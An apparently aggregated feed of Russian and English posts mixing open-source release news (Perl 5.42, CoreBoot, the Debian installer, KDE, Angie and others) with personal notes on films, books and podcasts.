Посмотрел фильм "Иллюзия побега" (Superposition), 2023 год.

Предвзято относился к нему, так как стандартная тема двойников, кажется, обсосана (в том числе) в кинематографе уже неисчислимое количество раз.
Но картина оказалась достойной внимания. Фантастическая завязка как авансцена, на которой происходит действие, а вся глубина в человеческих отношениях. Минимум информации, что бы не перегружать объяснениями, но достаточно, что бы понять происходящее.

P.S. А какая красивая природа в фильме...

(#чтопосмотреть)

KDE Plasma 6.4 has landed in OpenBSD

This was made possible by the efforts of Rafael Sadowski (rsadowski@) with the help of several others. The news was announced 2025-07-04 via a fediverse post and of course the commit message itself, where the description reads

Log message:
Update Plasma 6.4

The most parts are straightforward as usual but in 6.4 the KDE
Kwin team split kwin into kwin-x11 and kwin (wayland). This seems
to be the sign that X11 is no longer of interest and we are
focussing on Wayland.

Read more…

Blink and you'll miss it! 4096 colours and flashing text on the console!

List:       openbsd-misc
Subject:    Console 4096 colours and blink attribute
From:       Crystal Kolipe <kolipe.c () exoticsilicon ! com>
Date:       2025-07-04 13:58:41

Tired of having just 256 colours on your console instead of 4096?

Do you miss the blink attribute from the old VGA text mode days?

Want to learn how cool stuff like this is implemented?

Look no further:

https://research.exoticsilicon.com/articles/console_4096

Clicking that link will bring you a colorful article with all implementation details and links to the code for you to try out yourself.

Happy blink and 4k colors console day to all who celebrate!

Game of Trees Hub now taking signups for repository hosting

We have started our first round of sign-up for #Git repository hosting.

Our first server for Git hosting is expected to be installed next week. Additional servers will be added as needed based on demand.

See https://gothub.org for an introduction to our project.

See https://gothub.org/features.html to get an idea about which features are already working and what is planned for the future.

See https://gothub.org/tiers.html for the initial service tier configurations and prices.

See https://gothub.org/signup.html for details about the sign-up process.

Do you have code that could need to be hosted, and/or money to send their way? Click the links!

Релиз Multipass 1.16, инструментария для развёртывания Ubuntu в виртуальных машинах

Multipass позволяет разработчику одной командой без дополнительных настроек запустить нужную версию Ubuntu в виртуальной машине, например, для экспериментов или проверки работы своего приложения. Для запуска виртуальной машины в Linux используется KVM или VirtualBox, в Windows - Hyper-V, а в macOS - HyperKit. Поддерживается работа в дистрибутивах Arch Linux, CentOS, Debian, elementary OS, Fedora, KDE Neon, Kubuntu, Manjaro, Pop!_OS, openSUSE, Red Hat Enterprise Linux, Ubuntu и Raspberry Pi OS.

Инструментарий самостоятельно извлекает необходимый образ операционной системы и поддерживает его в актуальном состоянии. Для настройки может применяться cloud-init. Предусмотрена возможность как монтирования дисковых разделов в виртуальное окружение (команда "multipass mount"), так и передачи отдельных файлов между хост-системой и виртуальной машиной (команда "multipass transfer"). Поддерживается полная интеграция установленной виртуальной машины с основным рабочим столом (добавляются пиктограммы приложений, системное меню и уведомления).

Основные изменения:

• Предоставлена возможность запуска в macOS и Windows собственных образов виртуальных машин, используя ссылки на локальный (file://) или внешний файл (https://).
• Модернизирован графический интерфейс для управления виртуальными машинами и взаимодействия с сервисами multipass. Добавлена возможность запуска виртуальной машины с использованием конфигурации, применяемой для другой виртуальной машины. В терминале добавлена возможность масштабирования вывода (Ctrl + "+", Ctrl + "-", Ctrl + "0").
• На Linux хостах с архитектурой ARM реализована поддержка запуска с использованием QEMU.
• Добавлена возможность запуска виртуальной машины кнопкой "Open shell".
• Обеспечено сохранение размера окна и улучшен выбор размеров окон по умолчанию.
• Улучшена поддержка переноса данных через буфер обмена.
• Для шифрования трафика gRPC задействован gRPC.
• В разряд устаревших переведены драйверы запуска систем с использованием LXD и libvirt. Указанные драйверы будут удалены в следующей версии.

Релиз свободного игрового движка OpenMW 0.49

Код проекта написан на С++ и распространяется под лицензией GPLv3. В интерфейсе редактора OpenMW-CS и лаунчера используется Qt, во внутриигровом интерфейсе применяется MyGUI. Для работы с устройствами ввода задействован SDL, а для вывода звука - OpenAL. Готовые сборки подготовлены для Linux (PPA, flatpak), Windows и macOS. Для запуска необходимо наличие файлов с игровыми ресурсами из оригинальной игры Morrowind или установка альтернативного набора ресурсов.

Среди изменений в новой версии:

• Расширены возможности AI, например, боты теперь могут пить зелья.
• Реализована поддержка плавного перехода между анимациями, позволяющая повысить реалистичность анимации за счёт интерполяции состояний между ключевыми кадрами групп анимации в различных стилях. Переработана логика анимации во время боя
• Расширены возможности для создания расширений на языке Lua: скрипты на Lua теперь могут управлять и взаимодействовать с анимацией, звуком, магическими эффектами, квестами, виртуальной файловой системой, телепортацией объектов, созданием объектов, загрузкой данных в формате YAML, сохранением игр и загрузкой сохранённых игр.
• Изменена механика ближнего боя, которая приближена к оригинальной игре Morrowind в таких особенностях, как неспособность ботов атаковать вверх или вниз. Упрощена система ударов, в которой теперь задействовано сканирование окружения игрока с использованием конуса попадания. Для игрока стало проще попадать в летающих врагов, а летающим врагам в свою очередь стало легче атаковать игрока. Повышена реалистичность оценки попаданий при ближнем бое, которая теперь производится не в момент удара, а после его завершения, что, например, даёт возможность уклоняться от ударов.
• Реализована возможность появления морских существ в областях за пределами основной карты.
• Модернизирована система освещения при отрисовке - повышена реалистичность бликов и отражений от точечных источников света, добавлены более красивые эффекты волн и ряби на воде. Добавлены настройки для имитации оригинального вида игры Morrowind.
• В физическом движке повышена точность и предсказуемость обнаружения коллизий при взаимодействии персонажей с окружающей средой.
• Повышена стабильность пост-процессинга. Добавлены униформы шейдеров для цвета неба и окружающей среды. Обеспечено сохранение целевых рендеров между кадрами для поддержки временных эффектов.
• B консоль добавлена поддержка поиска среди вывода и сохранения истории введённых команд между сеансами.
• Прекращена поддержка сохранённых игр, записанных в версиях OpenMW до 0.45.
• Игровой редактор и графические утилиты портированы на Qt 6. В ланчер и мастер установки добавлен перевод на русский язык.
• Началась работа над реализацией поддержки игр на более свежих версиях движка Bethesda, таких как Oblivion (2006), Skyrim, Fallout 3, Fallout: New Vegas и Fallout 4. Файлы с ресурсами из этих игр могут использоваться для создания модов для Morrowind или примеров игр от OpenMW.

Проект KDE развивает собственную виртуальную клавиатуру

Plasma-keyboard базируется на коде входящей в состав Qt экранной клавиатуры Qt Virtual Keyboard, расширенной возможностями для интеграции с рабочим столом Plasma и решающей некоторые проблемы с удобством использования. Из недавних изменений отмечается реализация собственного стиля оформления клавиатуры "Breeze", напоминающего оформление клавиатуры Maliit, и задействование нового алгоритма масшабирования, позволившего улучшить отображение клавиатуры на узких экранах.

Среди недавних изменений в кодовой базе, формирующей будущий релиз KDE Plasma 6.5:

• В окне предпросмотра содержимого папок на рабочем столе для пустых папок обеспечен показ заглушки с информацией об отсутствии элементов (просто пустое окно создавало впечатление сбоя при отрисовке интерфейса).
• При создании скринкаста отдельного окна, запись теперь охватывает и всплывающие окна, создаваемые данным окном.
• В мастере настойки Bluetooth по умолчанию включено скрытие неименованных устройств.
• При приглушении звука для всей системы тихий режим теперь отключается для всех устройств при любом изменении громкости (ранее тихий режим выключался только для активного устройства, но сохранялся для дополнительных звуковых устройств).
• Обновлён шаблон виджетов KDE Plasma, который приведён в соответствие со стилем и технологиями Plasma 6.
• В ветке KDE Frameworks 6.16 в диалоге сохранения и открытия файлов при сортировке по дате самые свежие файлы теперь показываются в верхней части списка, а не внизу. Устранены аварийные завершения, проявлявшиеся в приложениях на базе фреймврока Kirigami, таких как System Settings и Discover. Первая проблема проявлялась во время прокрутки колесом мыши при отключённой анимации в настройках, а вторая - при использовании программной отрисовки.

We have started our first round of sign-up for #Git repository hosting.

Our first server for Git hosting is expected to be installed next week. Additional servers will be added as needed based on demand.

See https://gothub.org for an introduction to our project.

See https://gothub.org/features.html to get an idea about which features are already working and what is planned for the future.

See https://gothub.org/tiers.html for the initial service tier configurations and prices.

See https://gothub.org/signup.html for details about the sign-up process.

Релиз CoMaps 2025.06.30, форка картографического приложения Organic Maps

Форк развивается в соответствии с принципами открытости, прозрачности и совместной работы. Проект сосредоточен на ведении только некоммерческой деятельности, подотчётности сообществу и удовлетворении интересов сообщества. Ключевые принципы развития приложения: ориентация на работу в offline-режиме, забота о конфиденциальности (работа без идентификации личности и без сбора данных), эффективное потребление энергии и компактный размер, бесплатность и отсутствие рекламы.

Основные изменения в CoMaps 2025.06.30-22:

• Для Android добавлена функция автоматического резервного копирования меток и треков.
• Добавлены контурные линии высот с шагом 100м для всех регионов, где линии с этим шагом отсутствовали.
• Картографические данные OpenStreetMap обновлены до состояния на 22 июня.
• Обновлены пиктограммы остановок автобуса, трамвая, железнодорожных станций и станций метро.

Релиз CoMaps 2025.06.30, форка картографического приложения Organic Maps

Форк развивается в соответствии с принципами открытости, прозрачности и совместной работы. Проект сосредоточен на ведении только некоммерческой деятельности, подотчётности сообществу и удовлетворении интересов сообщества. Ключевые принципы развития приложения: ориентация на работу в offline-режиме, забота о конфиденциальности (работа без идентификации личности и без сбора данных), эффективное потребление энергии и компактный размер, бесплатность и отсутствие рекламы.

Основные изменения в CoMaps 2025.06.30-22:

• Для Android добавлена функция автоматического резервного копирования меток и треков.
• Добавлены контурные линии высот с шагом 100м для всех регионов, где линии с этим шагом отсутствовали.
• Картографические данные OpenStreetMap обновлены до состояния на 22 июня.
• Обновлены пиктограммы остановок автобуса, трамвая, железнодорожных станций и станций метро.

Выпуск Angie 1.10.0, форка Nginx

Сопровождением разработки занимается компания "Веб-сервер", образованная осенью 2022 года и получившая инвестиции в размере 1 млн долларов. Среди совладельцев компании Веб-сервер: Валентин Бартенев (лидер команды, развивавшей продукт Nginx Unit), Иван Полуянов (бывший руководитель фронтэнд-разработчиков Rambler и Mail.Ru), Олег Мамонтов (руководитель команды техподдержки NGINX Inc) и Руслан Ермилов (ru@FreeBSD.org). =

Изменения в Angie 1.10.0:

• Добавлена директива docker_endpoint для настройки автоматического получения и динамического обновления групп проксируемых серверов на основе списка контейнеров, полученного через обращение к API Docker или Podman. Новая возможность позволяет в реальном времени отслеживать запуск и остановку контейнеров и, соответственно, добавлять их IP-адреса в список upstream или удалять из него без перезагрузки конфигурации.
• В модуль stream добавлена поддержка автоматического получения TLS-сертификатов по протоколу ACME (применяется в Let's Encrypt). Для настройки в директиве acme следует использовать переменные $acme_cert_* и $acme_cert_key_*.
• Добавлен блок настроек client {...}, позволяющий определять настройки, применяемые в контексте для именованных location, обслуживающих исходящие HTTP-запросы, формируемые различными модулями Angie (например, запросы к серверам ACME, обращения к API Docker).
• Из проекта FreeNginx перенесена поддержка приёма соединений с использованием Multipath TCP (MPTCP), включаемая через добавление параметра multipath в директиву listen.
• Обновлены версии пакетов angie-console-light 1.8.0, angie-module-cgi 0.13 и angie-module-otel 0.1.2.
• Из репозитория проекта nginx перенесены изменения, предложенные в версии nginx 1.27.5. Например, перенесена поддержка алгоритма управления сетевой перегрузкой CUBIC (RFC 9438) для соединений, использующих протокол QUIC.

Я в отпуске недавно был, решил что надо хотя бы одну книжку из худ литературы прочитать. Опять вспомнил про "Улисса" Джеймса Джойса. Я уже начинал её читать и было тяжело. В этот раз опять взялся, читаю и опять тяжело идёт. Постоянно отсылки в тексте, непонятно вообще про что сюжет, что-то происходит, но не понятно к чему все это автор описывает. Я решил почитать что пишут про "Улисса" и погуглил. Вообщем если кратко, то в романе много отсылок к другим книгам, например "Одиссея" Гомера или "Гамлет" Шекспира. Естественно я ни того ни другого не читал. В инете есть даже тексты с инструкциями о том, как именно надо читать "Улисса", в том числе от самого переводчика "Улисса" на русский язык Сергея Хоружего [1]. Отпуск давно уже кончился, но не сдаюсь, читаю дальше. Для книги в отпуске это не самый лучший вариант.

1. https://james-joyce.ru/articles/kak-chitat-ulyssa.htm

В инсталляторе Fedora 43 намерены прекратить поддержку MBR на системах x86 с UEFI

В качестве причины прекращения поддержки MBR упоминается низкая надёжность загрузки в подобных конфигурациях, разнобой поддержки MBR в прошивках и отсутствие должного тестирования в Fedora (в документации на GRUB2 предписано использовать GPT для UEFI). Предполагается, что оставив в инсталляторе Anaconda только поддержку GPT на системах x86 удастся исключить аварийные завершения на стадии загрузки, вызванные сбоями efibootmgr. Прекращение поддержки MBR также снизит нагрузку на людей, занимающихся поддержкой пользователей, упростит сопровождение и тестирование.

Изначально поддержка MBR в режиме UEFI была добавлена в Fedora в 2019 году для совместимости с облачными платформами, такими как AWS, не поддерживающими GPT. В настоящее время облачные платформы избавились от данного ограничения и поддержка MBR в этом контексте потеряла актуальность.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63520

Пока не читал Мальпертюи, но посмотрел отличную экранизацию (с Орсоном Уэллсом, между прочим) и был очень рад обнаружить знакомых по коротким рассказам персонажей: крайне мерзких сестёр-монахинь, пьяниц-моряков, несуществующие улицы.

А ещё фильм атмосферой мне очень напомнил Золотую цепь Александра Грина, даже имя Кассавиус показался похожим на гриновского робота Ксаверия. Не удивлюсь, если сходство неслучайно.

#кино

Наблюдаю за штормом и наводнением. Надеюсь (нет), город наконец смоет в Р'льех.

#ЛенинградНутряной

По творческой задумке начальника на 9 мая в колонии устраивают парад. Для этого на плацу ставят трибуну, похожую на мавзолей, на которую заходят руководители ИК и приглашенные гости из местных элит, чтобы посмотреть на зрелище. На параде сначала, как и на Красной площади, маршем идут зеки, одетые в робу и белые перчатки, которые сами же себе заранее шьют на производстве. А потом «едут» танки. Танки сделаны из фанеры. Толкают их те самые бывшие офицеры.

Купил на озоне зарядник, так сразу прислали памятку в коллаборации с МЧС, как безопасно заряжать...

Доступен язык программирования Perl 5.42

Ветка 5.42 выпущена в соответствии с утверждённым двенадцать лет назад фиксированным графиком разработки, подразумевающим выпуск новых стабильных веток раз в год и корректирующих релизов - раз в три месяца. Примерно через месяц планируется выпустить первый корректирующий релиз Perl 5.42.1, в котором будут исправлены наиболее значительные ошибки, выявленные в процессе внедрения Perl 5.42.0. Одновременно с выходом Perl 5.42 прекращена поддержка ветки 5.38, для которой обновления могут быть выпущены в будущем только в случае выявления критических проблем с безопасностью. В ближайшее время начнётся процесс разработки экспериментальной ветки 5.43, на базе которой в июне 2026 года будет сформирован стабильный релиз Perl 5.44, если не будет принято решение перейти к нумерации 7.x.

Ключевые изменения:

• Добавлены экспериментальные операторы обработки списков - "any { BLOCK } @list" и "all { BLOCK } @list", которые напоминают оператор grep, но могут возвращать только значения true или false. Оператор "all" возвращает "true" при выполнении условия для всех элементов списка, а оператор "any" - при выполнении условия хотя бы для одного элемента. Функциональность операторов аналогична функциям из модуля List::Util, но встроенные варианты быстрее и потребляют меньше памяти.

     use v5.42;
     use feature 'keyword_all';
     no warnings 'experimental::keyword_all';
     my @numbers = ...
     if ( all { $_ % 2 == 0 } @numbers ) {
         say "All the numbers are even";
     }
  

• Для определяемых внутри класса полей реализован атрибут ":writer", применяемый для автоматического создания метода, записывающего значение переменной в поле для текущего экземпляра класса.

     class Point {
         field $x :reader :writer :param;
         field $y :reader :writer :param;
     }
     my $p = Point->new( x => 20, y => 40 );
     $p->set_x(60);
  
   Добавлена поддержка определения лексических методов, которая по аналогии с определением лексических подпрограмм ("lexical_subs"), позволяет создавать методы, доступные только в области лексической видимости блока в котором они  были созданы. Для создания подобных методов используется выражение "my имя_метода".
  
   Добавлен оператор "-›&", позволяющий вызывать подпрограммы, находящиеся в лексической области видимости, так, как будто они являются методами. В сочетании с возможностью определения лексических методов новый оператор реализует функциональность, похожую на  приватные методы.
  
   Добавлен оператор присвоения "A ^^= B", выполняющий операцию 
  "A = A XOR  B".
  
  
  
   Добавлена прагма "source::encoding", определяющая кодировку исходного кода. Для кода в кодировке ASCII можно указать "use source::encoding 'ascii'" (по умолчанию), а для UTF-8 -  "use source::encoding 'utf8'", при этом последнее выражение эквивалентно выражению "use utf8". Интерпретатор выведет ошибку, если в коде, помеченном как ASCII, встречаются символы UTF-8, или если в коде, помеченном как UTF-8, используются escape-последовательности "\x{}". Для отключения проверки для области кода можно использовать значение "use no source::encoding". На практике, добавленная прагма может быть полезной для выявления случаев, когда разработчик забыл указать "use utf8" для кода в кодировке UTF-8.
  
  
   Функция chdir() добавлена в пространство имён "CORE::" (например, теперь к данной функции можно обращаться как "&CORE::chdir($dir)" или "my $ref = \&CORE::chdir; $ref->($dir)").
  
   Добавлено выражение 'no feature "apostrophe_as_package_separator"' для отключения поддержки использования символа " ' " в качестве разделителя имён пакетов (например, "My'Module'Var" вместо "My::Module::Var"). Изначально планировалось удалить в Perl 5.42 поддержку подобных разделителей, которые ранее были объявлены устаревшими, но в ходе обсуждений было решено сохранить данную возможность по умолчанию, но предусмотреть опцию для отключения.
     
   В число возвращаемых возможностей переведена функциональность "switch" и оператор "~~", которые ранее были помечены устаревшими и были запланированы к удалению. Начиная с выпуска Perl 5.36 и 5.42  возможности "switch" и  "~~" по умолчанию отключены при привязке кода к версиям языка (например, при указании "use v5.42"), но могут быть активированы выражениями 'use feature "switch"' и 'use feature "smartmatch"'.
  
  
   Добавлена поддержка спецификации Unicode 16.0.
  
  
  
  
  
  

Some #Panasonic and #OpenBSD love.

https://x61.sh/log/2025/07/03072025160538-panasonic_openbsd.html

🎧 Чай с гитарой: https://pod.link/1508884638

— душевный #подкаст Маши Быкони и Даши Дягилевой об андеграундной музыке, неспешный уютный #разговор с гостями вперемежку с их песнями.
В далёком 22ом даже Ефр из Markscheider Kunst побывал:
🎧: https://pod.link/1508884638/episode/90481da9e244a4dada8adb163f4e0981

🎶

#music #music_podcast #undeground_music #музыка

В дисциплинарном обществе человек существует в изолированных пространствах — школа, казарма, завод, тюрьма. > Переходя из одного пространства в другое (от школы – к казарме, от казармы – к заводу), индивид постоянно начинает всё заново, его предыдущий опыт обнуляется: «забудьте всё, чему вас учили в школе» .

В новом обществе контроля границы размываются. Закрытые пространства изоляции сменяются открытыми полями, в которых действует непрерывный надзор, оценка и управление. Контроль в отличие от старой системы «проступок->наказание» становится постоянным, текучим и распределённым.

Я продолжаю - и пока не собираюсь бросать - заниматься переводами Mastodon на русский язык.

Чтобы переводы были лучше, можно подарить мне справочную литературу, например:

* "Справочник по правописанию и литературной правке" Розенталя;
* "Трудные случаи русской пунктуации" - Пахомов, Свинцов, Филатов;
* ещё что-нибудь, что посчитаете полезным.

Если я утвердила неудачный перевод, не стесняйтесь тегать меня в Crowdin:
https://ru.crowdin.com/project/mastodon/ru

Nintendo Virtual Boy and Bandai コンピュータビジョン光速船 Vectrex in the ゲーセン at:

https://icm.museum

This combo is historically guaranteed to stimulate vision and audio receptors 🤣

#retrogaming #vintagecomputing #retrocomputing

Возобновлена работа над лицензией Copyleft-next, развиваемой на смену GPLv3

Целью проекта является разработка копилефт лицензии нового поколения, идущей на смену лицензии GPLv3, а также учитывающей современные реалии и потребности корпораций, развивающих свободные проекты. Отмечается, что лицензии GPLv3 исполнилось 18 лет, а GPLv2 - 34 года, и за это время в сообществе назрела потребность в пересмотре применения жёсткого копилефта.

Текст лицензии Copyleft-next основан на лицензии GPLv3, очищенной от лишних нагромождений и ограничений, что позволило улучшить совместимость с пермиссивными лицензиями и добиться переносимости с проектами под лицензией Apache. Лицензия значительно сокращена и упрощена для восприятия (например, убраны введение с политикой фонда СПО, приложение с пояснениями по применению, упоминания избыточных и устаревших компромиссов).

Одним их принципиальных отличий от существующих копилефт лицензий стал пункт "Copyleft Sunset", отменяющий условия соблюдения копилефта через 15 лет после первой публикации кода под лицензией Copyleft-next. В частности, через 15 лет лицензия превращается в разрешительную, так как прекращают действовать пункты 3-5 c требованиями по распространению производных продуктов под лицензией Copyleft-next, запретом наложения дополнительных ограничений и обязательной доступности исходного кода при распространении бинарных сборок.

Другим нетипичным новшеством является аннулирование копилефт защиты при двойном лицензировании проекта - под лицензией Copyleft-next и коммерческой лицензией. Если продукт дополнительно поставляется под коммерческой лицензией или на условиях, противоречащих критериям OSI или Фонда СПО, то в свободном варианте продукта прекращают действовать пункты 3-5, обеспечивающие копилефт-защиту произведения (лицензия превращается в пемиссивную).

Из возможностей Copyleft-next также можно отметить отзыв лицензии в случае нарушения условий использования (например, если началось распространение производного продукта без предоставления доступа к исходному коду). На исправление нарушения даётся 13 дней. Лицензия также отзывается у лиц, инициировавших судебный процесс по нарушению патентов (за исключением встречных исков), пересекающихся с проектом под лицензией Copyleft-next.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63515

Второй кандидат в релизы инсталлятора Debian 13

Среди изменений по сравнению с прошлой тестовой версией инсталлятора:

• В busybox прекращена поставка утилиты wget.
• В apt-setup отключено включение cdrom в число источников для загрузки пакетов, если установочный носитель не является реальным CD.
• Версия ядра Linux обновлена до 6.12.33+deb13.
• Прекращено выставление опции "--force-overwrite" в DPKG_UNPACK_OPTIONS.
• В средствах для людей с ограниченными возможностями улучшен синтез речи.
• В grub-installer по умолчанию активирован параметр "force-efi-extra-removable", решающий проблемы с некоторыми EFI-прошивками, некорректно работающими с загрузочными переменными EFI.
• В partman-crypto обеспечена установка systemd-cryptsetup вместе с cryptsetup-initramfs.
• Добавлена опция для восстановления систем с Btrfs, установленных инсталлятором Calamares, применяемым в некоторых Live-сборках Debian.
• В systemd-boot-installer обеспечена установка пакета shim-signed на системах amd64 и arm64 для использования режима UEFI Secure Boot.
• В console-setup добавлена поддержка клавиатур MTP и SPI, применяемых в ноутбуках Apple, таких как M1 MacBook Pro и M2 MacBook Air.
• В udeb с образом ядра для систем amd64 добавлен драйвер pinctrl-intel для GPIO-контроллеров Intel.

В октябре в Переславле-Залесском состоится конференция разработчиков свободных программ

Оргкомитет принимает заявки на доклады по следующим темам:

• Разработка свободного программного обеспечения;
• Новейшие достижения проектов СПО;
• Формирование сообщества разработчиков СПО;
• Философские, культурные и правовые аспекты свободного ПО;
• Студенческие проекты разработки СПО;
• Разработка свободного аппаратного обеспечения (OSHW).

Требования к докладам:

• Доклады о проприетарном ПО не допускаются.
• Для тем о программном обеспечении обязательна ссылка на код в открытом репозитории со свободной лицензией (ГОСТ Р 54593-2011, FSF или OSI).
• Для открытых аппаратных систем материалы должны соответствовать определению Open Source Hardware (OSHW) Definition.

Тезисы докладов выйдут отдельным сборником и будут опубликованы в национальной библиографической базе данных научного цитирования РИНЦ. Заявки принимаются: на доклады до 7 сентября 2025 года; на участие слушателем с трансфером из Москвы - до 29 сентября 2025 года, без трансфера - до 1 октября.

Участие в конференции для докладчиков и слушателей бесплатное, предоставляется бесплатный трансфер из Москвы и обратно. Проживание выступающих оплачивается организаторами для одного докладчика на доклад. Компенсация проезда докладчиков по территории РФ возможна по дополнительному согласованию с оргкомитетом.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63512

В GNOME 49 просмотрщик документов Evince заменят на приложение Papers

Приложение Papers является форком Evince, созданным год назад одним из участников разработки ветки evince-next с целью существенной модернизации кодовой базы. Ключевыми отличиями Papers стало портирование на библиотеку GTK4 и задействование языка Rust для разработки - на Rust переписывается код, обеспечивающий работу интерфейса пользователя. Из значительных отличий также выделяется существенная модернизация оформления, повышение производительности и интеграция средств для заверения документов цифровой подписью.

По функциональности Papers близок к Evince и также позволяет просматривать, искать и аннотировать документы в форматах PDF, DjVu, TIFF и архивах комиксов (CBR, CBT, CBZ, CB7). При этом в Papers проведена чистка API библиотек libppsdocument и libppsview, а также прекращена поддержка формата DVI и платформы Windows. Многие внутренние виджеты Evince заменены на стандартные виджеты GTK. Прекращено использование фонового процесса papersd. Вместо ручной перезагрузки документа подобная операция теперь выполняется автоматически при определении изменения файла. Убрана отдельная панель с инструментами для добавления аннотаций, вместо которой рекомендовано использовать контекстное меню или горячие клавиши.

@shuro@friends.deko.cloud добро пожаловать отсюда, здесь вам не тут.

Добрался до мартовского интервью Светова на Асебии. Вот как он мне раньше нравился во время "пандемии", так сейчас кажется, что что-то перемудрил. Вроде мысли интересные и во многом правильные, но всё в целом сливается в что-то бессмысленное и неоправданное.

@continue ну я пока нашла вот такой фронт, вроде есть все что нужно - https://github.com/zlsl/flibusta

А архивы книг можно выкачивать автоматически раз в месяц с официальных торрентов (ссылка есть на флибусте). Правда я пока не настраивала нормальные автоапдейты (и вообще вот эту часть - просто пока 1 раз скачала свежий архив книг на терабайт с лишним)

Posted on 29 июня, 2025 Автор: idb@kiwiarxiv
Кризис Муравьиной Мельницы

( Июнь 2025, idb@kiwiarxiv )

Датский физик-теоретик Йеспер Гримструп, проведя в научных исследованиях около четверти века, в итоге обнаружил, что занятия большинства его коллег-учёных сильно напоминают один известный природный феномен из жизни муравьёв.

https://kiwibyrd.org/2025/06/29/25h63/

Люди ― путешественники… Земля ― это их матрица… лишь остановка на пути, но по каким-то причинам путешественники прервали свой путь… Люди были пойманы в нечто типа вихря, кругового потока, который создавал ощущение движения, хотя они оставались, по сути, неподвижными… Колдуны были единственными противниками той силы, которая поработила людей… посредством своей науки шаманы вырывались из ловушки и продолжали свой путь осознания. (Карлос Кастанеда, «Активная сторона бесконечности»)

Выпуск загрузочных прошивок CoreBoot 25.06, Libreboot 25.06 и Canoeboot 25.06

Основные изменения:

• Реализована поддержка материнских плат:
  • ASUS H61M-A/USB3;
  • CWWK CW-ADL-4L-V1.0 и CW-ADLNTB-1C2L-V3.0;
  • Intel Google Chrome EC;
  • MiTAC Computing R520G6SB и SC513G6;
  • NovaCustom V540TNx (14") и V560TNx (16");
  • Siemens MC RPL1;
  • Star Labs Byte Mk III (N355);
  • System76 darp11 и lemp13;
  • 21 плата, применяемая в различных устройствах с Chrome OS или на серверах Google.
• Добавлена поддержка пятого поколения процессоров Intel Xeon Scalable - "Emerald Rapids", позволяющая использовать CoreBoot на последних платформах Intel для серверов и рабочих станций. Среди прочего реализованы появившиеся "Emerald Rapids" новые возможности управления энергопотреблением. Продолжена работа над реализацией поддержки будущего поколения Intel "Panther Lake".
• Добавлена поддержка SoC Qualcomm Snapdragon X Plus X1P-42-100 и улучшена поддержка платформ MediaTek MT8189 и MT8196.
• Полностью переработана инфраструктура для показа заставки во время загрузки. В новой реализации улучшена отрисовка информации, добавлена поддержка различных типов логотипов, добавлена возможность размещения дополнительной информации в нижней части экрана, предоставлены средства для управления выравниванием логотипа по горизонтали, улучшено отслеживание окончания отрисовки, интегрирована возможность отдельной обработки состояний с низким зарядом аккумулятора.
• В утилиту cbfstool, применяемую для управления ФС CBFS (CoreBoot File System), добавлен режим multi-ELF, позволяющий разработчикам прошивок встраивать в одну запись CBFS несколько бинарных файлов в формате ELF. Подобное может использоваться в сценариях, в которых необходима одновременная загрузка нескольких компонентов или используются компоненты TEE (Trusted Execution Environment).
• Для Wi-Fi и Bluetooth реализована поддержка DSM-функций PRR (Power Reduction Request), существенно расширяющих возможности управления энергопотреблением в подсистемах для беспроводных устройств. Например, реализованные методы ACPI позволяют операционным системам запрашивать включение агрессивных режимов экономии энергии во время простоя или когда беспроводные функции не используются. Реализация совместима со спецификациями режима Standby от Microsoft, что позволяет синхронизировать энергопотребление беспроводных устройств с состояниями спящего режима в операционных системах, в том числе в Windows.
• В подсистеме vboot, применяемой для верифицированной загрузки, обеспечено создание резервных копий данных CMOS на поздних стадиях загрузки. Изменение обеспечивает дополнительную защиту от повреждения данных при возникновения аварийных ситуаций во время запуска прошивки и позволяет сохранить целостность важных параметров конфигурации при экстренном отключении питания во время выполнения сложных процедур инициализации.
• В Kconfig добавлена опция VBOOT_EC_SYNC_ESOL для управления поведением синхронизации встроенных контроллеров.
• В сборочной системе обеспечена совместимость с GCC 15. В crossgcc реализована поддержка спецификаций для архитектуры набора команд RISC-V. Значительно улучшено управление субмодулями и упрощено отслеживание обновлений сторонних компонентов.
• В документацию добавлено разъяснение политики проекта в отношении использования AI-инструментов при написании кода. Добавлены пункты о том, что разработчики должны обладать правами на код и несут ответственность за соответствие передаваемого кода стандартам качества CoreBoot и соблюдение лицензий. При нарушении прав третьих лиц код будет удаляться или заменяться.

Дополнительно можно отметить релиз свободной загрузочной прошивки Libreboot 25.06, который получил статус стабильного выпуска, сосредоточенного на оттачивании функциональности, добавленной в экспериментальных выпусках (стабильные релизы в основном содержат исправления и публикуются примерно раз в год, прошлый стабильный релиз был в декабре). Проект развивает готовую сборку проекта Coreboot, предоставляющую замену проприетарным прошивкам UEFI и BIOS, отвечающим за инициализации CPU, памяти, периферийных устройств и других компонентов оборудования, с минимизацией бинарных вставок.

Libreboot нацелен на формирование системного окружения, позволяющего обойтись без проприетарного ПО настолько, насколько это возможно, не только на уровне операционной системы, но и прошивки, обеспечивающей загрузку. Libreboot дополняет Coreboot средствами для упрощения применения конечными пользователями, формируя готовый дистрибутив, которым может воспользоваться любой пользователь, не имеющий специальных навыков.

По сравнению с прошлым стабильным релизом добавлена поддержка материнской платы Acer Q45T-AM, а также мини-ПК Dell Precision T1700 SFF и MT. Улучшена система сборки. Добавлена возможность сборки с использованием GCC 15. CoreBoot синхронизирован с репозиторием по состоянию на 20 апреля. С актуальными кодовыми базами синхронизированы компоненты GRUB2, U-Boot, SeaBIOS, flashprog, uefitool и NASM.

Оборудование, поддерживаемое в Libreboot:

• Серверные материнские платы:
  • ASUS KFSN4-DRE
  • ASUS KGPE-D16
• Десктоп-системы:
  • Gigabyte GA-G41M-ES2L;
  • Acer G43T-AM3, Q45T-AM;
  • Intel D510MO / D410PT;
  • Apple iMac 5,2;
  • HP Elite 8200 SFF/MT;
  • HP Elite 8300 USDT;
  • ASUS KCMA-D8;
  • Dell Precision T1650, T1700 SFF/MT;
  • Intel D945GCLF
  • Dell OptiPlex 3050 Micro, 7010, 7020, 9010 и 9020 серии SFF, XE2 SFF, MT и XE2 MT, 780 USFF/MT ;
• Ноутбуки:
  • ThinkPad X60 / X60S / X60 Tablet;
  • ThinkPad T60;
  • Lenovo ThinkPad X200 / X200S / X200 / X220 / X220 eDP / X230 Tablet;
  • Lenovo ThinkPad X301;
  • Lenovo ThinkPad R400;
  • Lenovo ThinkPad T400 / T400S / T420 / T420S / T430 / T440 / T480 / T480S.
  • Lenovo ThinkPad T500 / T530;
  • Lenovo ThinkPad W530 / W541;
  • Lenovo ThinkPad R500;
  • HP EliteBook 2560p / 2570p / 2170p / 8470p / Folio 9470m;
  • HP EliteBook 820 G2;
